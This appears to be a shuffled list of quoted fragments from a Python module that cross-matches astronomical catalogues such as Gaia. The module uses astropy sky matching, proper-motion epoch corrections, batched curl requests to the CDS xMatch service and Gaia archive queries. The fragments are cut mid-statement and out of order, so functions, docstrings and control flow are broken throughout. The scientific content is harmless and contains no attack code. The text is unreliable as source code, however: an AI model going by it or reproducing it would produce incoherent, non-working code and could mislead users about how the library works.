dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat2[colpmDec2]/3600000.*depoch", "will be noticed at the end and filtered out d2d", "temp_idx, temp_d2d, d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 = numpy.arange(len(cat2)) idx[cat2[col_field] ==", "except ValueError: runs= '' nruns= 2**len(runs) if nruns >= nruns_necessary:", "in the CDS archive using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch);", "of the tag in cat2 with the declination in degree", "small enough to not fail\"\"\" # Figure out which of", "hierarchy we are running runs= ''.join([str(int(r)-1) for r in posfilename1.split('csv.')[-1].split('.')])", "posfile1: with open(posfilename2,'a') as posfile2: for line in posfile: if", "nruns_necessary= _cds_match_batched(resultfilename1,posfilename1, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+\"Working on CDS xMatch batch {}", "cat1 (assumed to be ICRS) colDec1= ('DEC') name of the", "cds_matchback PURPOSE: Match a matched catalog from xmatch.cds back to", "- Account for Gaia epoch 2015 - Bovy (UofT) 2019-07-07", "tag in cat2 with the proper motion in declination in", "mRA, m.DEC as mDEC from %s.gaia_source as g inner join", "int64 dtype_list = [('{}'.format(i), numpy.float64) for i in to_list] dtype_list[dtype_list.index(('source_id',", "selection, '-F','RESPONSEFORMAT=csv', '-F','cat1=@%s' % os.path.basename(posfilename), '-F','colRA1=RA', '-F','colDec1=DEC', '-F','cat2=%s' % xcat,", "degree in cat2 (assumed to be ICRS) colDec2= ('DEC') name", "selection != 'all': selection= 'best' if selection == 'all': raise", "int64 will keep its precision data = numpy.genfromtxt(filename, delimiter=',', skip_header=0,", "cross-match against, in a format understood by the CDS cross-matching", "non-existing proper motion dra[numpy.isnan(cat2[colpmRA2])]= 0. ddec[numpy.isnan(cat2[colpmDec2])]= 0. else: dra= 0.", "numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique] idx_2 = numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique] if idx_1.shape[0]", "ma= cds_load(resultfilename) if gaia_all_columns: from astroquery.gaia import Gaia # Write", "know that we should # be using smaller batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat)", "Use proper motion to get both catalogs at the same", "astropy import units as u from ..load.download import _ERASESTR def", "files os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2) return nruns_necessary def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat): #", "as mRA, m.DEC as mDEC from %s.gaia_source as g inner", "ICRS) [only used when epoch != 2000.] gaia_all_columns= (False) set", "\"\"\" if epoch1 is None: if 'ref_epoch' in cat1.dtype.fields: epoch1=", "cds_matchback OUTPUT: (xcat entries for those that match, indices into", "resultfile.write(line) with open(resultfilename2,'r') as resultfile2: for line in resultfile2: if", "loop over the class idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique] idx_2", "\"\"\" if selection != 'all': selection= 'best' if selection ==", "in cat.dtype.fields: if 'designation' not in cat.dtype.fields: # Assume this", "operation can complete else: if swap: idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) m1=", "of a time-out, so we recursively split until the batches", "epoch of the coordinates in cat colpmRA= ('pmra') name of", "xcat - matched catalog returned by xmatch.cds colRA= ('RA') name", "are running runs= ''.join([str(int(r)-1) for r in posfilename1.split('csv.')[-1].split('.')]) nruns= 2**len(runs)", "Can stop counting once this if is done else: posfile2.write(line)", "cross-match on RA and Dec with additional matching in the", "in cat1.dtype.fields: epoch1= cat1['ref_epoch'] else: epoch1= 2000. if epoch2 is", "epoch= cat['ref_epoch'] else: epoch= 2000. _check_epoch(cat,epoch) depoch= epoch-2000. if numpy.any(depoch", "inner join tap_upload.my_table as m on m.source_id = g.source_id\"\"\" %", "actually exists in both cat1/cat2 cat1[col_field] cat2[col_field] except KeyError: #", "numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, max_rows=1, dtype='float64') # only read", "pass else: return nruns # xMatch failed because of time-out,", "= mc2.match_to_catalog_sky(mc1) m1= numpy.arange(len(cat2)) else: idx,d2d,d3d = mc1.match_to_catalog_sky(mc2) m1= numpy.arange(len(cat1))", "be ICRS; includes cos(Dec)) [only used when epoch != 2000.]", "indices into cat of matching sources: index[0] is cat index", "in cat with the proper motion in declination in degree", "output from CDS to this path; can match back using", "the right ascension in degree in cat2 (assumed to be", "epoch2= cat2['ref_epoch'] else: epoch2= 2000. _check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2) depoch= epoch2-epoch1 if", "numpy.arange(len(cat2)) else: idx,d2d,d3d = mc1.match_to_catalog_sky(mc2) m1= numpy.arange(len(cat1)) # to make", "time dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat2[colpmDec2]/3600000.*depoch # Don't shift objects with", "posfile2.write(line) # Run each sys.stdout.write('\\r'+\"Working on CDS xMatch batch {}", "cat2 of matching objects, angular separation between matching objects) HISTORY:", "failed to retrieve all gaia columns, returning just the default", "in resultfile1: resultfile.write(line) with open(resultfilename2,'r') as resultfile2: for line in", "(2000.) epoch of the coordinates in cat2 colpmRA2= ('pmra') name", "m1 = numpy.arange(len(cat2)) idx[cat2[col_field] == unique] = idx_1[temp_idx] d2d[cat2[col_field] ==", "catalog mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec) return (ma,mai) def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1): \"\"\"CDS", "# Can stop counting once this if is done else:", "Don't shift objects with non-existing proper motion dra[numpy.isnan(cat[colpmRA])]= 0. ddec[numpy.isnan(cat[colpmDec])]=", "not fail\"\"\" # Figure out which of the hierarchy we", "name of the tag in cat with the right ascension", "arcsec colRA= ('RA') name of the tag in cat with", "NotImplementedError(\"selection='all' CDS cross-match not currently implemented\") # Write positions posfilename=", "def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1): \"\"\"CDS xMatch (sometimes?) fails for large matches,", "idx = numpy.zeros(len(cat2), dtype=int) else: d2d = numpy.ones(len(cat1)) * -1.", "None: os.remove(resultfilename) else: shutil.move(resultfilename,savefilename) # Match back to the original", "= numpy.arange(len(cat1)) idx[cat1[col_field] == unique] = idx_2[temp_idx] d2d[cat1[col_field] == unique]", "everything as fp64 and then convert source_id to int64 will", "failure pass else: return nruns # xMatch failed because of", "epoch != 2000.] colpmDec= ('pmdec') name of the tag in", "the field actually exists in both cat1/cat2 cat1[col_field] cat2[col_field] except", "CDS xMatch batch {} / {} ...\\r\"\\ .format(thisrun1,nruns)) sys.stdout.flush() nruns_necessary=", "matching - Leung (UofT) \"\"\" if epoch1 is None: if", "path; can match back using cds_matchback OUTPUT: (xcat entries for", "with the declination in degree in cat2 (assumed to be", "and filtered out d2d = numpy.ones(len(cat2)) * -1. idx =", "idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique] idx_2 = numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique]", "we should # be using smaller batches _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat) try: ma=", "the header line with open(posfilename1,'w') as posfile1: with open(posfilename,'r') as", "epochs are different) INPUT: cat1 - First catalog cat2 -", "service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface INPUT: cat - a", "DR2' in cat['designation'][0].decode('utf-8'): if numpy.any(numpy.fabs(epoch-2015.5) > 0.01): warn_about_epoch= True if", "nruns= 2**len(runs) if nruns >= nruns_necessary: # Only run this", "in cat with the proper motion in right ascension in", "epoch to 2015. (DR1) or 2015.5 (DR2), which may lead", "with the proper motion in declination in degree in cat2", "CDS to this path; can match back using cds_matchback OUTPUT:", "# Assume this is the time-out failure pass else: return", "\"\"\" NAME: cds_matchback PURPOSE: Match a matched catalog from xmatch.cds", "idx,d2d,d3d = mc1.match_to_catalog_sky(mc2) m1= numpy.arange(len(cat1)) # to make sure filtering", "> 0.01): warn_about_epoch= True if warn_about_epoch: warnings.warn(\"You appear to be", "import Table from astropy import units as u from ..load.download", "with the declination in degree in cat1 (assumed to be", "workload to just get the column name to_list = list(data.dtype.names)", "a string, then cross-match on RA and Dec with additional", "in posfilename2.split('csv.')[-1].split('.')]),2) # Count the number of objects with open(posfilename,'r')", "select either all matches or the best match according to", "time-out failure pass else: return nruns # xMatch failed because", "u from ..load.download import _ERASESTR def xmatch(cat1,cat2,maxdist=2, colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec',", "acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec, unit=(u.degree, u.degree),frame='icrs') if col_field is not None: try: #", "col_field=None): \"\"\" NAME: xmatch PURPOSE: cross-match two catalogs (incl. proper", "& (0.*u.arcsec <= d2d)) m1= m1[mindx] m2= idx[mindx] if swap:", "index of xcat[0] HISTORY: 2016-09-12 - Written - Bovy (UofT)", "thisrun2= 1+int(''.join([str(int(r)-1) for r in posfilename2.split('csv.')[-1].split('.')]),2) # Count the number", "as posfile2: for line in posfile: if cnt == 0:", "savefilename=None,gaia_all_columns=False): \"\"\" NAME: cds PURPOSE: Cross-match against a catalog in", "includes cos(Dec)) [only used when epochs are different] colpmDec2= ('pmdec')", "ii in range(len(cat)): wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360., cat[ii][colDec]]-ddec[ii]) _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat) # Directly", "OUTPUT: (xcat entries for those that match, indices into cat", "numpy import astropy.coordinates as acoords from astropy.table import Table from", "epoch2= 2000. _check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2) depoch= epoch2-epoch1 if numpy.any(depoch != 0.):", "import sys import os import os.path import platform import shutil", "# times neg one to indicate those indices untouch will", "exists in both cat1/cat2 cat1[col_field] cat2[col_field] except KeyError: # python", "of the cross-match tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T, names=('source_id','RA','DEC'), dtype=('int64','float64','float64')) xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd()) tab.write(xmlfilename,format='votable')", "CDS cross-match not currently implemented\") # Write positions posfilename= tempfile.mktemp('.csv',dir=os.getcwd())", "don't already know that we should # be using smaller", "failed because of time-out, split posfilename1= posfilename+'.1' posfilename2= posfilename+'.2' resultfilename1=", "in degree in cat2 (assumed to be ICRS) [only used", "epoch != 2000.] gaia_all_columns= (False) set to True if you", "which are untouched mindx= ((d2d < maxdist*u.arcsec) & (0.*u.arcsec <=", "get around this by squeezing precision from int64 on source_id", "the declination selection= ('best') select either all matches or the", "nruns= 2**len(runs) thisrun1= 1+int(runs,2) thisrun2= 1+int(''.join([str(int(r)-1) for r in posfilename2.split('csv.')[-1].split('.')]),2)", "[('{}'.format(i), numpy.float64) for i in to_list] dtype_list[dtype_list.index(('source_id', numpy.float64))] = ('source_id',", "coordinates in cat2 colpmRA2= ('pmra') name of the tag in", "= mc2.match_to_catalog_sky(mc1) mindx= d2d < 1e-5*u.arcsec return idx[mindx] def _check_epoch(cat,epoch):", "line with open(posfilename1,'w') as posfile1: with open(posfilename,'r') as posfile: posfile1.write(posfile.readline())", "is cat index of xcat[0] HISTORY: 2016-09-12 - Written -", "epoch1= (2000.) epoch of the coordinates in cat1 colRA2= ('RA')", "posfile: posfile2.write(posfile.readline()) # Cut in half cnt= 0 with open(posfilename,'r')", "recursively split until the batches are small enough to not", "when epoch != 2000.] colpmDec= ('pmdec') name of the tag", "if we don't already know that we should # be", "return None def cds_load(filename): if WIN32: # windows do not", "if os.path.exists(resultfilename): result.close() os.remove(resultfilename) result.close() return None def cds_load(filename): if", "times neg one to indicate those indices untouch will be", "index[0] is cat index of xcat[0]) HISTORY: 2016-09-12 - Written", "# make sure finally we have an unit on d2d", "name of the tag in cat1 with the declination in", "open(resultfilename,'w') as resultfile: with open(resultfilename1,'r') as resultfile1: for line in", "Account for Gaia epoch 2015 - Bovy (UofT) 2019-07-07 -", "from astropy import units as u from ..load.download import _ERASESTR", "Match back to the original catalog mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec) return", "sum(1 for line in posfile) # Write the header line", "be noticed at the end and filtered out d2d =", "0. else: dra= 0. ddec= 0. mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs')", "unique] = temp_d2d else: temp_idx, temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1", "in cat2 with the proper motion in right ascension in", "to reduce workload to just get the column name to_list", "tag in cat1 with the right ascension in degree in", "if a string, then cross-match on RA and Dec with", "else: epoch2= 2000. _check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2) depoch= epoch2-epoch1 if numpy.any(depoch !=", "ddec= cat[colpmDec]/3600000.*depoch # Don't shift objects with non-existing proper motion", "PURPOSE: Cross-match against a catalog in the CDS archive using", "nruns # xMatch failed because of time-out, split posfilename1= posfilename+'.1'", "are untouched mindx= ((d2d < maxdist*u.arcsec) & (0.*u.arcsec <= d2d))", "data release.... table_identifier = xcat.split('/')[-1] if table_identifier == 'gaia2': table_identifier", "the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface INPUT:", "on RA and Dec with additional matching in the data", "using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses the curl interface", "HISTORY: 2016-09-12 - Written based on RC catalog code -", "declination in degree in cat (assumed to be ICRS) [only", "as resultfile: with open(resultfilename1,'r') as resultfile1: for line in resultfile1:", "numpy.zeros(len(cat)) # xmatch to v. small diff., because match is", "idx_1[temp_idx] d2d[cat2[col_field] == unique] = temp_d2d else: temp_idx, temp_d2d, d3d", "cat with the right ascension colDec= ('DEC') name of the", "cat1.dtype.fields: epoch1= cat1['ref_epoch'] else: epoch1= 2000. if epoch2 is None:", "which may or may not work... savefilename= (None) if set,", "== 'all': raise NotImplementedError(\"selection='all' CDS cross-match not currently implemented\") #", "Dec; if a string, then cross-match on RA and Dec", "unique] idx_2 = numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique] if idx_1.shape[0] == 0", "those indices untouch will be noticed at the end and", "name of the catalog to cross-match against, in a format", "against a catalog in the CDS archive using the CDS", "'-F','RESPONSEFORMAT=csv', '-F','cat1=@%s' % os.path.basename(posfilename), '-F','colRA1=RA', '-F','colDec1=DEC', '-F','cat2=%s' % xcat, 'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'],", "maximum distance in arcsec colRA= ('RA') name of the tag", "mc2.match_to_catalog_sky(mc1) mindx= d2d < 1e-5*u.arcsec return idx[mindx] def _check_epoch(cat,epoch): warn_about_epoch=", "in cat2 with the right ascension in degree in cat2", "have float128, but source_id is double # get around this", "untouched mindx= ((d2d < maxdist*u.arcsec) & (0.*u.arcsec <= d2d)) m1=", "cat (assumed to be ICRS) [only used when epoch !=", "CDS xMatch instead...\") else: ma.rename_column('mra','RA') ma.rename_column('mdec','DEC') finally: os.remove(xmlfilename) # Remove", "as posfile: posfile2.write(posfile.readline()) # Cut in half cnt= 0 with", "return idx[mindx] def _check_epoch(cat,epoch): warn_about_epoch= False if 'ref_epoch' in cat.dtype.fields:", "else: return (m1,m2,d2d[mindx]) def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC', selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec', savefilename=None,gaia_all_columns=False): \"\"\" NAME: cds", "format understood by the CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things", "NAME: cds_matchback PURPOSE: Match a matched catalog from xmatch.cds back", "posfile2: with open(posfilename,'r') as posfile: posfile2.write(posfile.readline()) # Cut in half", "make sure finally we have an unit on d2d array", "epoch difference - Bovy (UofT) \"\"\" if selection != 'all':", "on CDS xMatch batch {} / {} ...\\r\"\\ .format(thisrun2,nruns)) sys.stdout.flush()", "m1= numpy.arange(len(cat2)) else: idx,d2d,d3d = mc1.match_to_catalog_sky(mc2) m1= numpy.arange(len(cat1)) # to", "runs= ''.join([str(int(r)-1) for r in posfilename1.split('csv.')[-1].split('.')]) nruns= 2**len(runs) thisrun1= 1+int(runs,2)", "(see below) xcat= ('vizier:I/350/gaiaedr3') name of the catalog to cross-match", "according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch= (2000.) epoch", "dra= 0. ddec= 0. mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(cat2[colRA2]-dra,cat2[colDec2]-ddec,", "None, simply cross-match on RA and Dec; if a string,", "# Cut in half cnt= 0 with open(posfilename,'r') as posfile:", "0 with open(posfilename,'r') as posfile: with open(posfilename1,'a') as posfile1: with", "like 'vizier:Tycho2' or 'vizier:I/345/gaia2') maxdist= (2) maximum distance in arcsec", "set, save the output from CDS to this path; can", "posfile: with open(posfilename1,'a') as posfile1: with open(posfilename2,'a') as posfile2: for", "WIN32: # windows do not have float128, but source_id is", "objects, index into cat2 of matching objects, angular separation between", "as resultfile2: for line in resultfile2: if line[0] == 'a':", "cat - a catalog to cross match, requires 'RA' and", "into cat of matching sources: index[0] is cat index of", "= 'gaiadr2' try: job= Gaia.launch_job_async( \"\"\"select g.*, m.RA as mRA,", "Written based on RC catalog code - Bovy (UofT) 2016-09-21", "[only used when epoch != 2000.] colpmDec= ('pmdec') name of", "proper motion in declination in degree in cat2 (assumed to", "2018-05-08 - Added gaia_all_columns - Bovy (UofT) \"\"\" if epoch", "# Write the header line with open(posfilename1,'w') as posfile1: with", "result= open(resultfilename,'w') try: subprocess.check_call(['curl', '-X','POST', '-F','request=xmatch', '-F','distMaxArcsec=%i' % maxdist, '-F','selection=%s'", "delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype=dtype_list) else: return numpy.genfromtxt(filename, delimiter=',', skip_header=0,", "maxdist*u.arcsec) & (0.*u.arcsec <= d2d)) m1= m1[mindx] m2= idx[mindx] if", "and then convert source_id to int64 will keep its precision", "with open(posfilename,'r') as posfile: posfile1.write(posfile.readline()) with open(posfilename2,'w') as posfile2: with", "warnings.warn(\"You appear to be using a Gaia catalog, but are", "m1= numpy.arange(len(cat1)) # to make sure filtering out all neg", "ddec[numpy.isnan(cat[colpmDec])]= 0. else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) if selection !=", "if line[0] == 'a': continue resultfile.write(line) # Remove intermediate files", "windows do not have float128, but source_id is double #", "or 'vizier:I/345/gaia2') maxdist= (2) maximum distance in arcsec colRA= ('RA')", "KeyError: # python 2/3 format string raise KeyError(\"'%s' does not", "ICRS; includes cos(Dec)) [only used when epochs are different] colpmDec2=", "2000.] gaia_all_columns= (False) set to True if you are matching", "if the field actually exists in both cat1/cat2 cat1[col_field] cat2[col_field]", "import Gaia # Write another temporary file with the XML", "== 'Windows' import numpy import astropy.coordinates as acoords from astropy.table", "motion in declination in degree in cat2 (assumed to be", "http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2') maxdist= (2) maximum distance", "small diff., because match is against *original* coords, # not", "one of the catalogs has duplicates) col_field= (None) if None,", "2019-07-07 - add additional catalog field matching - Leung (UofT)", "Count the number of objects with open(posfilename,'r') as posfile: num_lines=", "for line in posfile) # Write the header line with", "two catalogs (incl. proper motion in cat2 if epochs are", "% xcat, 'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'], stdout=result) except subprocess.CalledProcessError: os.remove(posfilename) if os.path.exists(resultfilename): result.close()", "open(posfilename1,'a') as posfile1: with open(posfilename2,'a') as posfile2: for line in", "currently implemented\") # Write positions posfilename= tempfile.mktemp('.csv',dir=os.getcwd()) resultfilename= tempfile.mktemp('.csv',dir=os.getcwd()) with", "return nruns_necessary def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat): # Send to CDS for matching", "= d2d * temp_d2d.unit # make sure finally we have", "the coordinates in cat2 colpmRA2= ('pmra') name of the tag", "if swap: temp_idx, temp_d2d, d3d = mc2[idx_2].match_to_catalog_sky(mc1[idx_1]) m1 = numpy.arange(len(cat2))", "cross-matching catalogs import csv import sys import os import os.path", "uniques = numpy.unique(cat1[col_field]) if swap: # times neg one to", "return (m1,m2,d2d[mindx]) def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC', selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec', savefilename=None,gaia_all_columns=False): \"\"\" NAME: cds PURPOSE:", "be ICRS) [only used when epoch != 2000.] OUTPUT: Array", "'best' if selection == 'all': raise NotImplementedError(\"selection='all' CDS cross-match not", "save the output from CDS to this path; can match", "xmatch to v. small diff., because match is against *original*", "# Use proper motion to get both catalogs at the", "sys.stdout.flush() # Combine results with open(resultfilename,'w') as resultfile: with open(resultfilename1,'r')", "is always integer anyway # first read everything as fp64", "(None) if set, save the output from CDS to this", "we don't already know that we should # be using", "cat2 for each cat1 source, if False do the opposite", "if you are matching against Gaia DR2 and want *all*", "in right ascension in degree in cat2 (assumed to be", "posfilename1.split('csv.')[-1].split('.')]) nruns= 2**len(runs) thisrun1= 1+int(runs,2) thisrun2= 1+int(''.join([str(int(r)-1) for r in", "for line in posfile: if cnt == 0: cnt+= 1", "convert source_id to int64 will keep its precision data =", "between matching objects) HISTORY: 2016-09-12 - Written - Bovy (UofT)", "cnt < num_lines//2: posfile1.write(line) cnt+= 1 # Can stop counting", "cross-match two catalogs (incl. proper motion in cat2 if epochs", "xcat[0] HISTORY: 2016-09-12 - Written - Bovy (UofT) 2018-05-04 -", "for i in to_list] dtype_list[dtype_list.index(('source_id', numpy.float64))] = ('source_id', numpy.uint64) return", "return (ma,mai) def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat, nruns_necessary=1): \"\"\"CDS xMatch (sometimes?) fails for", "non-existing proper motion dra[numpy.isnan(cat[colpmRA])]= 0. ddec[numpy.isnan(cat[colpmDec])]= 0. else: dra= numpy.zeros(len(cat))", "in degree in cat2 (assumed to be ICRS) epoch2= (2000.)", "= g.source_id\"\"\" % table_identifier, upload_resource=xmlfilename, upload_table_name=\"my_table\") ma= job.get_results() except: print(\"gaia_tools.xmath.cds", "colpmDec2= ('pmdec') name of the tag in cat2 with the", "Bovy (UofT) 2016-09-21 - Account for Gaia epoch 2015 -", "'Gaia DR2' in cat['designation'][0].decode('utf-8'): if numpy.any(numpy.fabs(epoch-2015.5) > 0.01): warn_about_epoch= True", "Array indices into cat of xcat entries: index[0] is cat", "cat2 with the declination in degree in cat2 (assumed to", "posfilename1= posfilename+'.1' posfilename2= posfilename+'.2' resultfilename1= resultfilename+'.1' resultfilename2= resultfilename+'.2' # Figure", "if 'ref_epoch' in cat.dtype.fields: epoch= cat['ref_epoch'] else: epoch= 2000. _check_epoch(cat,epoch)", "Written - Bovy (UofT) 2018-05-04 - Account for non-zero epoch", "is not None: try: # check if the field actually", "coordinates in cat colpmRA= ('pmra') name of the tag in", "in cat.dtype.fields: epoch= cat['ref_epoch'] else: epoch= 2000. _check_epoch(cat,epoch) depoch= epoch-2000.", "d2d = numpy.ones(len(cat2)) * -1. idx = numpy.zeros(len(cat2), dtype=int) else:", "v. small diff., because match is against *original* coords, #", "catalog field matching - Leung (UofT) \"\"\" if epoch1 is", "of the catalog to cross-match against, in a format understood", "the best match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html)", "catalogs import csv import sys import os import os.path import", "filling_values=-9999.99, names=True, dtype=dtype_list) else: return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True,", "results with open(resultfilename,'w') as resultfile: with open(resultfilename1,'r') as resultfile1: for", "for line in resultfile2: if line[0] == 'a': continue resultfile.write(line)", "%s.gaia_source as g inner join tap_upload.my_table as m on m.source_id", "mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'], unit=(u.degree, u.degree),frame='icrs') idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) mindx= d2d <", "swap=False, col_field=None): \"\"\" NAME: xmatch PURPOSE: cross-match two catalogs (incl.", "the case where a class only exists in one but", "0. ddec[numpy.isnan(cat[colpmDec])]= 0. else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) # xmatch", "of the tag in cat1 with the declination in degree", "difference - Bovy (UofT) \"\"\" if selection != 'all': selection=", "(0.*u.arcsec <= d2d)) m1= m1[mindx] m2= idx[mindx] if swap: return", "unique] if idx_1.shape[0] == 0 or idx_2.shape[0] == 0: #", "numpy.arange(len(cat2)) idx[cat2[col_field] == unique] = idx_1[temp_idx] d2d[cat2[col_field] == unique] =", "match according to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch= (2000.)", "case where a class only exists in one but not", "= numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique] idx_2 = numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique] if", "in cat2 with the declination in degree in cat2 (assumed", "import platform import shutil import subprocess import tempfile import warnings", "os.remove(posfilename) if os.path.exists(resultfilename): result.close() os.remove(resultfilename) result.close() return None def cds_load(filename):", "the data release.... table_identifier = xcat.split('/')[-1] if table_identifier == 'gaia2':", "the proper motion in declination in degree in cat (assumed", "cross-match not currently implemented\") # Write positions posfilename= tempfile.mktemp('.csv',dir=os.getcwd()) resultfilename=", "# Only run this level's match if we don't already", "cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or 'vizier:I/345/gaia2') maxdist=", "- Written - Bovy (UofT) 2018-05-04 - Account for non-zero", "complete else: if swap: idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) m1= numpy.arange(len(cat2)) else:", "Combine results with open(resultfilename,'w') as resultfile: with open(resultfilename1,'r') as resultfile1:", "epoch=None,colpmRA='pmra',colpmDec='pmdec',): \"\"\" NAME: cds_matchback PURPOSE: Match a matched catalog from", "requires 'RA' and 'DEC' keywords (see below) xcat= ('vizier:I/350/gaiaedr3') name", "(UofT) \"\"\" if epoch is None: if 'ref_epoch' in cat.dtype.fields:", "entries for those that match, indices into cat of matching", "proper motion in right ascension in degree in cat (assumed", "print(\"gaia_tools.xmath.cds failed to retrieve all gaia columns, returning just the", "as posfile1: with open(posfilename,'r') as posfile: posfile1.write(posfile.readline()) with open(posfilename2,'w') as", "# construct a list where everything is fp64 except 'source_id'", "r in posfilename1.split('csv.')[-1].split('.')]) nruns= 2**len(runs) thisrun1= 1+int(runs,2) thisrun2= 1+int(''.join([str(int(r)-1) for", "resultfile.write(line) # Remove intermediate files os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2) return", "epoch1 is None: if 'ref_epoch' in cat1.dtype.fields: epoch1= cat1['ref_epoch'] else:", "cat.dtype.fields: # Assume this is DR1 if numpy.any(numpy.fabs(epoch-2015.) > 0.01):", "CDS xMatch batch {} / {} ...\\r\"\\ .format(thisrun2,nruns)) sys.stdout.flush() nruns_necessary=", "degree in cat2 (assumed to be ICRS) [only used when", "the original catalog mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec) return (ma,mai) def _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat,", "posfilename2.split('csv.')[-1].split('.')]),2) # Count the number of objects with open(posfilename,'r') as", "(m1,m2,d2d[mindx]) def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC', selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec', savefilename=None,gaia_all_columns=False): \"\"\" NAME: cds PURPOSE: Cross-match", "the CDS archive using the CDS cross-matching service (http://cdsxmatch.u-strasbg.fr/xmatch); uses", "csv import sys import os import os.path import platform import", "_check_epoch(cat,epoch): warn_about_epoch= False if 'ref_epoch' in cat.dtype.fields: if 'designation' not", "entries: index[0] is cat index of xcat[0] HISTORY: 2016-09-12 -", "def xmatch(cat1,cat2,maxdist=2, colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec', swap=False, col_field=None): \"\"\" NAME: xmatch", "is None: if 'ref_epoch' in cat.dtype.fields: epoch= cat['ref_epoch'] else: epoch=", "mindx= ((d2d < maxdist*u.arcsec) & (0.*u.arcsec <= d2d)) m1= m1[mindx]", "os.remove(resultfilename2) return nruns_necessary def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat): # Send to CDS for", "row max to reduce workload to just get the column", "Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T, names=('source_id','RA','DEC'), dtype=('int64','float64','float64')) xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd()) tab.write(xmlfilename,format='votable') #get the data release....", "opposite (important when one of the catalogs has duplicates) col_field=", "be ICRS) colDec1= ('DEC') name of the tag in cat1", "of the coordinates in cat2 colpmRA2= ('pmra') name of the", "the XML output of the cross-match tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T, names=('source_id','RA','DEC'), dtype=('int64','float64','float64'))", "in cat2 (assumed to be ICRS) [only used when epochs", "understood by the CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like", "open(posfilename,'r') as posfile: posfile2.write(posfile.readline()) # Cut in half cnt= 0", "== 'gaia2': table_identifier = 'gaiadr2' try: job= 